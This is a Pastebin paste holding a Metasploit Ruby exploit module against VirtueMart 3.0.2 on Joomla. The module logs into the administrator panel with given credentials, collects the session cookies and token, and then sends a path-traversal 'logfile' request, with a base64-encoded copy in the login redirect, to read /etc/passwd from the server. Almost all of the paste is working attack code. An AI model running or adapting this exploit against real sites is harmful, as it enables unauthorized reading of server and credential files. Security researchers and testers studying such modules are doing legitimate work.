Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This module requires Metasploit: http//metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- class Metasploit4 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
- 'Description' => %q{
- VirtueMart 3.0.2 is vulnerable to local file include attack.
- Authenticated user can read local files from the server.
- More here: https://twitter.com/HauntITBlog
- },
- 'Author' =>
- [
- 'HauntIT Blog', # Discovery
- # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
- 'http://hauntit.blogspot.com'
- ],
- 'License' => MSF_LICENSE,
- 'Privileged' => false,
- 'Platform' => ['php'],
- 'Arch' => ARCH_PHP,
- 'Targets' =>
- [
- [ 'Automatic', { } ],
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => ' 23.12.2014'))
- register_options(
- [
- OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
- OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
- OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
- OptRegexp.new('READFILE', [ false, 'Full path to file you want to read', '../etc/passwd'] ),
- ], self.class)
- end
- def check
- end
- def fetchMd5(my_string)
- if my_string =~ /([0-9a-fA-F]{32})/
- return $1
- end
- return nil
- end
- def exploit
- # 1st, we will get cookies and token
- req1 = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path,'administrator','index.php')
- })
- cookies = req1['set-cookie']
- if not req1
- fail_with("[-] Failed with 1st request")
- end
- print_status("[+] Good: " + req1.code.to_s)
- print_good("[+] Got cookie(s): " + cookies)
- token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
- if req1.body =~ token_pattern
- token = fetchMd5(req1.body)
- print_good("[+] Got token: "+ token.to_s)
- else
- print_status("[-] Token not found")
- end
- # now we need to do auth using that token and cookies
- print_status("[+] Trying to auth...")
- auth = send_request_cgi({
- 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
- 'cookie' => cookies,
- 'vars_post' => {
- 'username' => datastore['USERNAME'],
- 'passwd' => datastore['PASSWORD'],
- 'option' => 'com_login',
- 'task' => 'login',
- 'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
- token.to_s => 1
- }
- })
- print_good("[+] Code after auth: " + auth.code.to_s)
- # 3rd step: get + post params to lfi
- print_good('[+] Exploit...')
- readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
- xpl = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
- 'vars_get' => {
- 'option' => 'com_virtuemart',
- 'view' => 'log',
- 'task' => 'edit',
- 'logfile' => readthis
- },
- 'cookie' => cookies
- })
- if xpl
- print_good("[+] Exploit response code: " + xpl.code.to_s)
- print_good("[+] Response body after attack:")
- print_status(xpl.body)
- else
- fail_with("[-] Cannot exploit it :C")
- end
- end # exploit
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
